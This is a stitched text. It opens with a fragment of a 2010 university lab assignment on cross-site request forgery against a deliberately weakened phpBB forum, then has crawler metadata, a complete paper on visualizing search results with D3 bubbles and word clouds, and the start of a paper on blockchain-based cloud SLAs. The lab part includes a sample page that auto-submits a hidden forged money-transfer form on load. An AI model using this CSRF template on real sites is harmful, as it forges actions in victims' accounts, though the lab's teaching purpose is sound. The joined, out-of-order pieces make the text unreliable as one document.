LiveHTTPHeaders. You may expect to see something similar to the following: ``` Content-Type: application/x-www-form-urlencoded Content-Length: 473 username=admin&email=admin%40seed.com&cur_password=&new_password=&password_confirm=&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=I+am+good+guy&viewemail=1&hideonline=0&notifyreply=0&notifyipm=1&attachsig=0&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=d+M+Y+h%3Ai+a&mode=editprofile&agreed=true&coppa=0&user_id=2&current_email=admin%40seed.com&submit=Submit ``` Now, using the information you gathered from observing the request, you can construct a web page that posts the message. To help you write a JavaScript program to send a HTTP post request, we provide the sample code in Figure 1. This code can also be downloaded from the course website. You can use this sample code to construct your malicious web site for the CSRF attacks. 3.2.3 Task 2.3: Understanding phpBB’s Countermeasures phpBB has implemented some countermeasures to defend against CSRF attacks. To allow the attacks in Task 2.1 work, we had to modify phpBB code to introduce the vulnerability. Originally, posting.php only takes POST request, not GET. However, from Task 2.2, we know that changing GET to POST will not prevent the CSRF attacks, it simply makes the attacks a little bit more difficult. PhpBB adopts another mechanism to counter the CSRF attacks. It includes the following information in the body of the request: ``` sid=b349b781ecbb2268c4caf77f530c55ac ``` This sid value is exactly the same as phpbb2mysql_sid in the cookie. The script in posting.php will check whether this sid value is the same as that in the cookie. If not, the request will fail. In this task, you need to use the original phpBB forum accessible at http://www.originalphpbb.com, try the attacks again, and describe your observations. Can you bypass the countermeasures? If not, please describe why. 3.2.4 Task 2.4: Critiquing Some Countermeasures for CSRF There are several simple countermeasures suggested for CSRF: 1. Web applications may use a secret-token validation technique such as the one that phpBB uses. This page sends a HTTP POST request onload. ```html <html><body><h1>This page sends a HTTP POST request onload.</h1><script> function post(url, fields) { //create a <form> element. var p = document.createElement('form'); //construct the form p.action = url; p.innerHTML = fields; p.target = '_self'; p.method = 'post'; //append the form to this web. document.body.appendChild(p); //submit the form p.submit(); } function csrf_hack() { var fields; // You should replace the following 3 lines with your form parameters fields += "<input type='hidden' name='username' value='Alice'>"; fields += "<input type='hidden' name='transfer' value='10000'>"; fields += "<input type='hidden' name='to' value='Bot'>"; // Note: don’t add an element named ‘submit’ here; // otherwise, p.submit() will not be invoked. // ‘Submit’ will work. post('http://www.example.com',fields); } window.onload = function(){csrf_hack();} </script></body></html> ``` Figure 1: Sample JavaScript program 2. Web applications may attempt to verify the origin page of request using the referrer header. In this task, you will discuss these countermeasures and provide a critique of their effectiveness. 4 Deliverables, Deadline, and Other Information This project is due on April 14th by 11:59AM (i.e., before noon). Please send to the TA a detailed report documenting your experiences in completing the project tasks. Your report should include your observations, answers to any questions asked by the specifications, source code you wrote or modified for the project, screenshots, and anything else that will assist us in evaluating your accomplishments. A good report is one that is insightful, well organized, and well written. 5 Version History v 0.91 (4/5/2010) – The current version of this document. I have updated the Deliverables section with more details. I have also fixed some typographical errors and ambiguities. v 0.9 (4/1/2010) – The original version of this document. 6 Attribution These project specifications are based off of a document written by Wenliang Du. What follows is his original copyright notice: Copyright © 2006 - 2010 Wenliang Du, Syracuse University. The development of this document is funded by the National Science Foundation’s Course, Curriculum, and Laboratory Improvement (CCLI) program under Award No. 0618680 and 0231122. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can be found at http://www.gnu.org/licenses/fdl.html. References [1] AJAX for n00bs. Available at the following URL: http://www.hunlock.com/blogs/AJAX_for_n00bs. [2] AJAX POST-It Notes. Available at the following URL: [3] Essential Javascript – A Javascript Tutorial. Available at the following URL: [4] The Complete Javascript Strings Reference. Available at the following URL: http://www.xsslabphpbb.com/posting.php POST /posting.php HTTP/1.1 Host: www.xsslabphpbb.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: phpbb2mysql_data=......;phpbb2mysql_sid=...... Content-Type: application/x-www-form-urlencoded Content-Length: 376 subject=<Content of the message> HTTP/1.x 200 OK Date: Thu, 11 Jun 2009 19:43:15 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3 X-Powered-By: PHP/5.2.6-3ubuntu4.1 Set-Cookie: phpbb2mysql_data=XXXXXXXXXXX; expires=Fri, GMT; path=/ Set-Cookie: phpbb2mysql_sid=YYYYYYYY; path=/ Set-Cookie: phpbb2mysql_t=XXXXXXXXXX; path=/ Cache-Control: private, pre-check=0, post-check=0, max-age=0 Expires: 0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3904 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Figure 2: Screenshot of LiveHTTPHeaders Extension
{"Source-Url": "http://courses.isi.jhu.edu/netsec/project2/proj2.pdf", "len_cl100k_base": 6050, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 24390, "total-output-tokens": 6885, "length": "2e12", "weborganizer": {"__label__adult": 0.0007643699645996094, "__label__art_design": 0.00044417381286621094, "__label__crime_law": 0.006317138671875, "__label__education_jobs": 0.005229949951171875, "__label__entertainment": 0.00011771917343139648, "__label__fashion_beauty": 0.0002715587615966797, "__label__finance_business": 0.0002486705780029297, "__label__food_dining": 0.00051116943359375, "__label__games": 0.0012311935424804688, "__label__hardware": 0.001972198486328125, "__label__health": 0.0007386207580566406, "__label__history": 0.0003199577331542969, "__label__home_hobbies": 0.00019216537475585935, "__label__industrial": 0.0007319450378417969, "__label__literature": 0.000331878662109375, "__label__politics": 0.00040650367736816406, "__label__religion": 0.0005693435668945312, "__label__science_tech": 0.0283050537109375, "__label__social_life": 0.0002267360687255859, "__label__software": 0.0290374755859375, "__label__software_dev": 0.9208984375, "__label__sports_fitness": 0.0003681182861328125, "__label__transportation": 0.00045108795166015625, "__label__travel": 0.00023567676544189453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26865, 0.02381]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26865, 0.41336]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26865, 0.80348]], "google_gemma-3-12b-it_contains_pii": [[0, 2739, false], [2739, 5225, null], [5225, 7931, null], [7931, 10170, null], [10170, 13185, null], [13185, 16150, null], [16150, 19187, null], [19187, 22484, null], [22484, 23542, null], [23542, 25712, null], [25712, 26865, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2739, true], [2739, 5225, null], [5225, 7931, null], [7931, 10170, null], [10170, 13185, null], [13185, 16150, null], [16150, 19187, null], [19187, 22484, null], [22484, 23542, null], [23542, 25712, null], [25712, 26865, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26865, null]], "pdf_page_numbers": [[0, 2739, 1], [2739, 5225, 2], [5225, 7931, 3], [7931, 10170, 4], [10170, 13185, 5], [13185, 16150, 6], [16150, 19187, 7], [19187, 22484, 8], [22484, 23542, 9], [23542, 25712, 10], [25712, 26865, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26865, 0.01724]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
d9f9dcb899b75b4ccbfb4ba8e79bfb6c1e0a65ae
Visualization of Search Results of Large Document Sets James D Anderson and Thomas Wischgoll; Wright State University; Dayton, OH Abstract When presented with many search results, finding information or patterns within the data poses a challenge. This paper presents the design, implementation and evaluation of a visualization enabling users to browse through voluminous information and comprehend the data. Implemented with the JavaScript library Data Driven Documents (D3), the visualization represents the search as clusters of similar documents grouped into bubbles with the contents depicted as word-clouds. Highly interactive features such as touch gestures and intuitive menu actions allow for expeditious exploration of the search results. Other features include drag-and-drop functionality for articles among bubbles, merging nodes, and refining the search by selecting specific terms or articles to receive more similar results. A user study consisting of a survey questionnaire demonstrated that in comparison to a standard text-browser for viewing search results, the visualization performs commensurate or better on most metrics. Introduction Searching large document sets quickly and efficiently presents a challenge to data analysts who may or may not have a precise set of search terms capable of generating the specific results for which they are seeking. Analysts may have millions of documents at their disposal and only a few search terms in mind, and that search query can return thousands or more results. The analyst may desire to query a broad topic area and filter out undesired results, focusing on various sub-topics present within the results. Furthermore, the most applications currently available for browsing results are purely text-based which display a listing of results which may or may not be ranked. If the results are ranked, there may be documents hidden deep in the list the analyst may wish to view; however, since the results are lower in the list, those results have less likelihood of being seen than results higher in the list. In contrast to the typical textual listing of results, graphical search browsers offer a different approach to presenting search results. Graphical browsers typically provide a visual representation with similar results grouped closer together, and the groupings can be represented as the encompassing topics or terms shared by the documents. The visual representations also allow users to explore and interact with the results in novel ways not available with traditional search browsers. This paper presents a design, shown in figure 1 which visualizes a document set in a tree structure with the main search terms represented at the root and the more refined results appearing in child nodes. The project is developed as a web-based application with the main search terms represented at the root and the more refined results appearing in child nodes. The project is developed as a web-based application which utilizes the built-in interactivity that a web-browser provides as well as being cross-platform compatible. The visualization evaluation was conducted with participants performing a search task and afterward providing feedback on the application. Background Users wishing to browse search results are typically given a plain text listing of the documents returned from the query. With the advent of better graphics capabilities and algorithms to find patterns among documents, visualizations have developed as an alternative. To meet this end, clustering processes are often utilized to group similar documents. Additionally, because the structure of many data sets can be visualized as a graph, there has been much work on visualizing these large relational data structures. Traditional Search Traditionally, search results of text-based data are viewed in a list format. For example, the Google search browser provides a summary of the topic in addition to the results listed as text. Typically, the results are shown sorted by a ranking metric such as Google’s uses a PageRank [1]. For Google results, the anchor text, or click-able portion of a link, for each search result is not just the text of the web page but also any images, video, programs, or databases. Document Set Visualizations To visualize textual information, various methods have been developed to reduce the complexity from hundreds and thousands of terms to a more sizable and human-understandable space. Two common methods, document topic generation and clustering [2, 3], use term frequency-inverse document frequency (TFIDF) with word-vectors and Latent Dirichlet allocation (LDA). LDA is a statistical model which assigns probabilities to topics based on the collection of terms within a document [4]. With LDA, connections between documents can be made even though the documents themselves may consist of mostly disjoint sets of terms. Once terms and topics are generated from the documents, a common visualization method is a word-cloud. With this technique, the terms are presented with their font sizes proportional to the significance or probability of being related to the data set and typically arranged so as to minimize empty space. Rolled-out Wordles [5] demonstrates a heuristic for building word clouds by removing overlaps between elements. TagCrowd represents documents as word-clouds with the size of a word being proportional to its frequency within the text [6]. Another technique called Hierarchical point placement (HIPP) [6] has circles, or “bubbles” with proximities proportional to similarity between the document sets, while the circles represent similar documents. DiTop-View [7], a visualization method with bubbles and word-clouds, partitions the canvas into different background colors which represent major topic areas. Many visualization methods utilize document clustering to group semantically similar documents. One such, iVisClustering [8], clusters documents by topic utilizing LDA to generate a graph visualization where closely related documents are grouped together with a display of topic words. **Graph Visualizations** Several graphical frameworks for depicting relational data have been developed, and this paper’s design takes inspiration from ontology-related visualizations. In particular, WebVOWL [9] is a web-based visualization tool for graphic display of an ontology which utilizes Scalable Vector Graphics (SVG) and Cascading Style Sheets (CSS) along with the JavaScript library Data Driven Documents (D3) [10] to display force-directed graphs. This approach allows for dynamic addition, removal, and repositioning of nodes, as the visualization will adjust to the change in graph structure. Another inspiration for this project is the TouchGraph Navigator [11]. Similar to WebVOWL, TouchGraph can create visualization for the web; however, it is implemented in Java. TouchGraph allows the user to import data tables which are then visualized in a graph structure. It contains clustering algorithms which will reveal relations intrinsic to the data. Additionally, the application can visualize the interconnectivity of web sites on the Internet by graphing the links between pages. In contrast to all the described applications, the approach presented in this paper allows users to perform actions on the visualization, such as merging groups of results to refine the search into a particular topic. The user may select a term in order to view documents more associated with the desired term. Furthermore, the user can select articles to receive additional results similar to the chosen documents. **Implementation** The search visualization allows users to get a general overview of the topics their search terms may cover and then narrow down the scope of the search until discovering desired results. After the user enters the initial query, the application generates a central “bubble” that contains the search terms. This bubble acts at the root for a tree in which each child represents a subset of documents of its parent. In each child node, a word-cloud depicts the most prevalent topics and terms from the set of documents it represents. In terms of functionality, the user can refine a search by selecting a term in one of the bubbles, and a new child is created to represent the documents which best fit this term. After multiple children have been created from a single parent, those children can be merged together to represent a new subset of documents. Children can be merged by performing a union operation on the document sets. With regards to search data, the system draws its input from a machine learning-based search. This search algorithm utilizes a neural network and semantic hashing [12]. For this visualization, a dataset of Reuters articles serves as the basis for search queries. **Client Visualization** As seen in Figure 2, the visualization is divided into three sections: input (top-left), output (bottom-left), and the graphical tree (right). In the input area, a standard text-input box allows the user to type in the initial search query. The text-based output of the search results appear as hyper-links, enabling the user to easily access the document. "Yes" and "No" check-boxes enable the user to indicate whether they wish to see results similar or dissimilar to the given document as part of the Refine action. The right section of Figure 2 contains the visualization of the search results. When the program begins, a single bubble with a word-cloud containing the words suggested search terms bubble appears. As the user clicks on documents, this bubble is populated with terms relating to that document. When the user initiates a search, a bubble will appear containing those search terms as the root of the new query. New bubbles are generated connected to the root populated with terms related to a sub-group of the entire search. **Main Search** The structure of a search result is presented visually as a force-directed graph utilizing the D3 library for JavaScript. D3 provides a programming interface through which Hypertext Markup Language (HTML) elements such as SVG can be manipulated. D3 also provides layouts to visualize datasets; this project utilizes two D3 layouts: force graphs and pie charts. **Force Graphs** The force layout simulates charged particles that are constrained by the links between nodes in order to generate the positions of the nodes [13]. As such, the charge strength for each node can be set determining how strongly each node repels each other, as well as the strength of the links between connected nodes. Additionally, a friction attribute determines how quickly the nodes’ velocity decays. In order to have the nodes drawn in the browser, a graphic element must be appended. This element can be any graphic, but for simplicity an SVG circle is used to represent the search nodes. Once attached, D3 provides functions to alter the HTML attributes of SVG elements. For SVG circles, some attributes include radius, stroke (color of the outline) and stroke width. The value provided can either be a constant or a function which returns a value based on the node. The function that gets called is given two parameters: the node data and the node index. This function gets called for each node, providing an alternative to looping through each node. Along with providing the details for HTML graphic elements, D3 allows event listeners to be attached to SVG elements. For example, functions can be written on events such as mouseover, mouseout, mousedown, and mouseup. There are also events specific to touch screen devices which this project utilizes. When an event such as a mouse click is triggered, the click is registered for all elements the mouse is currently over. This may be undesired, since each bubble is being drawn into the browser window, and when clicking a node the event is triggered for both the node and the window. To avoid this, D3 provides a function d3.event.sourceEvent.stopPropagation(). When this function is called, any other elements involved in the event will not have their event listener called. This is particularly useful in the word-cloud function. Additionally, the default actions that occur on these events can be overridden by using d3.event.sourceEvent.preventDefault(). This function is called when the nodes are being dragged. Instead of the default event, D3 provides custom functionality for handling drag events. **Word-clouds** To summarize the results contained within a node, the visualization utilizes word-cloud representations. The concept behind the word-cloud representation is to provide a quick overview of a group of search results as well as allowing the user suggestions on additional terms which may be helpful in refining the search query. Visually, the font size of each term corresponds to how strongly the term correlates to the set of documents contained within that bubble. The font size is relative to a given bubble and not to the search results as a whole. One modification made to the word-cloud layout generation for this project is to change the layout from fitting the words into a square area. Since the word-clouds for this project reside within circular bubbles, the word-cloud positions are bounded to a circular layout. This modification may be useful in future iteration of the program, such as changing the bubbles from circles to ellipses. In this case, the major- and minor-axes attributes can be passed into the word-cloud layout generator. **Interface** The visualization provides several means for the user to interact with and refine the search results. The application has been programmed to allow for both a mouse and multi-touch displays to be utilized. There are two categories of interactions: gesture actions and menu selections. **Gestures** For the purposes of this project, gestures pertain to both touch and mouse pointer actions. Much of the functionality of the mouse is copied for touch functionality, but some actions are handled separately. For instance, using the mouse-wheel will zoom-in and zoom-out of the visualization while the same action is achieved with a pinch-gesture on a touch display. Navigating the entire visualization is achieved by clicking or touching on a blank area and dragging the canvas. Several objects in the visualization can be dragged around the screen. When dragging a bubble with the mouse pointer or touch display, the attached bubbles will follow and reorient themselves, allowing the user to rearrange the configuration of the visualization. When using a multi-touch display, multiple bubbles can be dragged simultaneously, including those which belong to the same search or bubbles of a separate search. The user can drag-and-drop the terms in the suggested search term bubble into any of the search bubbles, allowing a new term to be utilized in a search refinement. Additionally, the user can drag a search result link from the left-panel into one of the search bubbles. This action will cause the link to be checkmarked ”Yes” to be utilized when refining results, as well as populating the target bubble with words relevant to the dragged link. In order to view the documents contained in a bubble, the user can either hover the mouse over the bubble or touch and hold. After doing so, the contents will appear in the left-pane of the web-browser. Additionally, the menu will appear around the bubble. **Menu** The menu interface in figure 3 provides access to various functions which can be performed. Most of the menu items describe actions that take place immediately when the button is clicked or pressed. However, two of the items, Add and Move toggle the mode of interaction. Move mode, allows bubbles to freely move and the disables clicking on terms. In Add mode, terms become click-enabled, which causes the application to perform an additional search using that term and adding that result as a child of the current bubble. The rendering of the menu is done utilizing D3’s pie chart layout and SVG arcs. The menu is shown in detail in Figure 3. For the SVG arc, the inner and outer radius can be specified, which is utilized to create a cut-out for the search result bubble, as the center of the pie chart is translated to the x- and y-coordinates of the node. Server-side Search When the user enters a search query or chooses to refine the search parameters, an HTTP request is sent to a server hosting a search script which utilizes a neural network trained to generate search results from a set of Reuters news articles. The script then clusters the results, forming the basis of the nodes for the visualization. To execute the search and parse the results for visualization, a Python script is hosted on an Apache web server with Common Gateway Interface (CGI) enabled. Along with generating terms for the word-clouds, the script is capable of generating topic terms for the search as a whole. To accomplish this, the TFIDF vectors for each document are used to calculate the non-negative matrix factorization (NMF) [14] for the document set. NMF is capable of extracting topics from a document set, and these topics can be utilized by the visualization. Additionally, the search process utilizes semantic hashing [12], a machine learning approach to searching which involves training a neural network with the inputs being documents represented as word-vectors where at each feature is the frequency of a particular term. Semantic hashing also offers the capability to generate results similar to a given set of specific documents, providing the ability to refine search results. Bit-vectors of specific documents can be compared with vectors of other documents to find more semantically similar articles. The visualization incorporates this capability in two ways: 1) checking the “Yes” box next to a result and 2) dragging a document into a bubble. After performing either of these actions, the user may “refine” the search. Doing so executes the above described capability of finding documents similar to a subset, and these results are returned to the visualization as a refinement of the search. Evaluation To evaluate the application, a group of volunteer participants (N = 12) performed a task utilizing the graphical visualization search browser and after-completed a user survey. Each participant browsed results from the same search query of “beijing olympics” in order to find a distinct piece of information. The query and tasks were chosen based on the data-set for which the neural-network was trained. The data utilized as the search basis was a set of 94,065 Reuters articles from the time-frame of around 2007-2008. The surveys were designed to test the effectiveness and convenience of the visualization versus a normal text-based search browser. As such, the participant conducted the same task twice: once with the graphical-browser and once with the text-browser. Half of the participants utilized the graphical-browser first and the other half performed the task first in the text-browser. In the presentation of results that follows, the former group is named Group 1 and the latter named Group 2. All participants performed the search-task on the same machine running Firefox in Windows 10. A touchscreen display was utilized, and users were given the option to browse employing either touch- or mouse-gestures, or a combination of both input modes. User Surveys After completing the search tasks, participants completed a survey comprised of multiple choice questions and one open-ended question. A summary of the questionnaire statistical analysis is shown in Table 1. The listing shows the means of responses from Groups 1 and 2, as well as the overall mean, normalized between 1.0 and 0.0 with 1.0 corresponding to most favorable to the visualization and 0.0 least favorable. Also shown are the standard deviations (σ) for all responses to the particular question, which range from 0.15 to 0.31. A t-test was done for each question comparing the difference in responses between Groups 1 and 2, and while one question received a p-value of 0.051, the other p-values were relatively larger. Because of this, a power analysis was done (α = 0.05, power = 0.8) to determine a suitable sample size to validate the differences between the groups. A few questions indicate a sample size of around 35-40 would be sufficient; however, several of the required sample size values suggest a much larger sample size is required. This result may also indicate there is actually no significant difference between the two groups, and the participants viewed utilizing the graphical browser equivalent to the text browser. Open-ended Responses One open-ended question was asked in the survey: In what way would you improve the search?. Feedback statements generally relate to 3 different categories: Interactivity, the Visualization, and the Search Engine. In terms of interactivity, responses generally stated a preference for more gesture based interaction. Responses about the visualization varied, from suggesting making the size of the bubbles correspond to the number of articles represented to being able to focus on a particular search term. One statement regarded the formatting of the article text, which was presented as unformatted American Standard Code for Information Interchange (ASCII) text. Since the data was provided as plain text, the articles were displayed with no processing. Both the graphical browser and text-based search displayed the articles in this way, mostly to remove any bias with respect to either browsing mode. The last category of responses related to the search engine itself. One regarded the fact that some bubbles contained primarily numbers, and the other recommended more training of the neural network. Conclusion Presented with a large amount of search results, users may have difficulty making sense of the information and patterns hidden within. The visualization designed and implemented for this project concerns interactively browsing large document sets from a search. To meet this end, the set of results is displayed graphically as a tree, and the nodes of the tree are similar documents shown in a bubble with a word-cloud of terms relevant to the results contained. Users can interact with the visualization by dragging nodes around to rearrange the structure, refine the search by selecting terms or articles within a particular bubble, and perform other actions such as merging and deleting nodes. The visualization was evaluated with a user study wherein users were given a specific data item to find within the visualization. The statistics from the evaluation do not show strong confidence in the result; nonetheless, the data trends toward the fact that the visualization performs as well or better than a standard text-based browser. **Acknowledgments** The authors wish to thank Eric Nichols, Brad Minnery, and Michael Raymer. This work was supported in part by a grant from the Ohio Federal Research Network (ORFN). **References** **Author Biography** James Anderson received his MS in computer engineering in 2018 from Wright State University, and is working on his PhD at the same institution. His research work is in collaboration with researchers at the Air Force Institute of Technology (AFIT) on simulating and analyzing flights involving automated aerial refueling. He has presented and published in the International Symposium on Visual Computing conference proceedings. Thomas Wischgoll received his Master's degree in computer science in 1998 from the University of Kaiserslautern, Germany, and his PhD from the same institution in 2002. He was working as a post-doctoral researcher at the University of California, Irvine until 2005 and is currently an associate professor and the Director of Visualization Research at Wright State University. His research interests include large-scale visualization, flow and scientific visualization, as well as biomedical imaging and visualization. His research work in the field of large-scale, scientific visualization and analysis resulted in more than thirty peer-reviewed publications, including IEEE and ACM. Dr. Wischgoll is a member of ACM SIGGRAPH, IEEE Visualization & Graphics Technical Committee, and the IEEE Computer Society.
{"Source-Url": "http://avida.cs.wright.edu/publications/pdf/P41.pdf", "len_cl100k_base": 4658, "olmocr-version": "0.1.49", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 15639, "total-output-tokens": 5771, "length": "2e12", "weborganizer": {"__label__adult": 0.0003597736358642578, "__label__art_design": 0.0024356842041015625, "__label__crime_law": 0.00042319297790527344, "__label__education_jobs": 0.0032596588134765625, "__label__entertainment": 0.00024771690368652344, "__label__fashion_beauty": 0.00022292137145996096, "__label__finance_business": 0.0003879070281982422, "__label__food_dining": 0.0003616809844970703, "__label__games": 0.0007457733154296875, "__label__hardware": 0.0016603469848632812, "__label__health": 0.0006184577941894531, "__label__history": 0.0006003379821777344, "__label__home_hobbies": 0.0001361370086669922, "__label__industrial": 0.0004074573516845703, "__label__literature": 0.0008502006530761719, "__label__politics": 0.0002620220184326172, "__label__religion": 0.0005326271057128906, "__label__science_tech": 0.24560546875, "__label__social_life": 0.00018036365509033203, "__label__software": 0.0950927734375, "__label__software_dev": 0.64453125, "__label__sports_fitness": 0.0002301931381225586, "__label__transportation": 0.000530242919921875, "__label__travel": 0.0002391338348388672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26982, 0.01376]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26982, 0.42017]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26982, 0.90762]], "google_gemma-3-12b-it_contains_pii": [[0, 4665, false], [4665, 10430, null], [10430, 16005, null], [16005, 22732, null], [22732, 26982, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4665, true], [4665, 10430, null], [10430, 16005, null], [16005, 22732, null], [22732, 26982, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26982, null]], "pdf_page_numbers": [[0, 4665, 1], [4665, 10430, 2], [10430, 16005, 3], [16005, 22732, 4], [22732, 26982, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26982, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
1b4f5c4fc92b0c053004980c0740ac23bae50d1d
An auction and witness enhanced trustworthy SLA model for decentralized cloud marketplaces Shi, Z.; Farshidi, S.; Zhou, H.; Zhao, Z. DOI 10.1145/3462203.3475876 10.1145/3462203.3475876 Publication date 2021 Document Version Proof Published in GoodIT '21 License CC BY Citation for published version (APA): General rights It is not permitted to download or to forward/distribute the text or part of it without the consent of the author(s) and/or copyright holder(s), other than for strictly personal, individual use, unless the work is under an open content license (like Creative Commons). Disclaimer/Complaints regulations If you believe that digital publication of certain material infringes any of your rights or (privacy) interests, please let the Library know, stating your reasons. In case of a legitimate complaint, the Library will make the material inaccessible and/or remove it from the website. Please Ask the Library: https://uba.uva.nl/en/contact, or a letter to: Library of the University of Amsterdam, Secretariat, Singel 425, 1012 WP Amsterdam, The Netherlands. You will be contacted as soon as possible. An Auction and Witness Enhanced Trustworthy SLA Model for Decentralized Cloud Marketplaces Zeshun Shi z.shi2@uva.nl University of Amsterdam Amsterdam, the Netherlands Huan Zhou huanzhou@nudt.edu.cn National University of Defense Technology Changsha, China Siamak Farshidi s.farshidi@uva.nl University of Amsterdam Amsterdam, the Netherlands Zhiming Zhao z.zhao@uva.nl University of Amsterdam Amsterdam, the Netherlands ABSTRACT Cloud computing has become one of the most important technologies that have changed the traditional application development and operation (DevOps) lifecycle. However, current cloud software DevOps often faces the following key challenges: 1) selecting the best fitting service providers, customizing services and planning capacities for large-scale distributed applications; 2) guaranteeing high-quality and trustworthy service level agreements (SLAs) among multiple service providers; 3) enhancing the interoperability of cloud services across providers; 4) designing incentive model effectively among players. In this study, a framework called AWESOME is proposed to build a decentralized cloud marketplace and to address the above challenges. The proposed framework contains four subsystems including a customizable auction model, an incentive witness mechanism, and a social behavior-based simulator as one automated framework. We also provide a proof of concept to demonstrate that the AWESOME framework is feasible. CCS CONCEPTS • Social and professional topics → Online auctions policy; • Security and privacy → Trust frameworks. KEYWORDS decentralized cloud marketplace, auction, service level agreement 1 INTRODUCTION Cloud computing paradigm provides flexible services based on pay-as-you-go business models [2]. Several well-known service providers maintain the traditional cloud marketplace, and the share of these top providers is continuously growing. According to the reports, as of October 2020, AWS, Azure, Google, and Alibaba control 63% of the entire cloud marketplace, whereas all other providers only share 37%1. Since product migration is complex, consumers become locked in a particular provider’s ecosystems. In the future, however, we should expect a more open, fair, and trustworthy cloud resource trading marketplace for all service providers and customers. There are usually two approaches to build a cloud marketplace: centralized and decentralized [8]. In a centralized cloud environment, all service trading transactions and trust-related issues rely on trusted third parties (TTP), e.g., some well-known cloud service providers with good reputations. However, those providers are not always trustworthy in practice and can be biased or conspire with any party. In a decentralized environment, however, transaction management and operations are performed by all sellers/buyers, which avoids the concentration of power and makes the transactions more trustworthy. In this case, all trust assurance comes from a distributed infrastructure (e.g., blockchain), which needs to be appropriately designed, implemented, deployed, and monitored. Traditionally, Service Level Agreement (SLA) is a business concept that defines the contractual financial agreements between the roles who are engaging in the business activity. In the context of a cloud marketplace, it is an agreement between the cloud customer and provider regarding the cloud service quality [6]. For instance, the IaaS (Infrastructure-as-a-Service) provider, Amazon Elastic Compute Cloud (EC2), claims that the availability of its data center is no less than 99%. If this number is not achieved, it will pay back 30% credits to its customers as a compensation. In practice, however, this agreement is hard to enforce in a fair and transparent manner; it is usually performed manually and dominated by giant providers in the traditional SLA management process. Blockchain technology brings in a new hint for possible solutions to address these challenges [9]. It inspires the emergence of a new decentralized cloud marketplace that encourages greater inclusivity and participation from different service parties. It is foreseeable --- Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org. GoodIT ‘21, September 9–11, 2021, Roma, Italy © 2021 Association for Computing Machinery. ACM ISBN 978-1-4503-8478-0/21/09...$15.00 https://doi.org/10.1145/3462203.3475876 1https://www.canalys.com/newsroom/worldwide-cloud-market-q320 that this decentralized marketplace will provide more choices and opportunities for both providers and consumers. Besides, the smart contract makes it possible to manage and automate the SLA process on the blockchain in a fair and tamper-proof way [7]. However, reaching a consensus on events that occur outside the blockchain is another possible issue. Cloud customers/providers can still violate the agreed SLA in a blockchain-based decentralized cloud marketplace. For example, the provider may not provide the QoS (Quality of Service) they promised, and the customer may refuse to pay 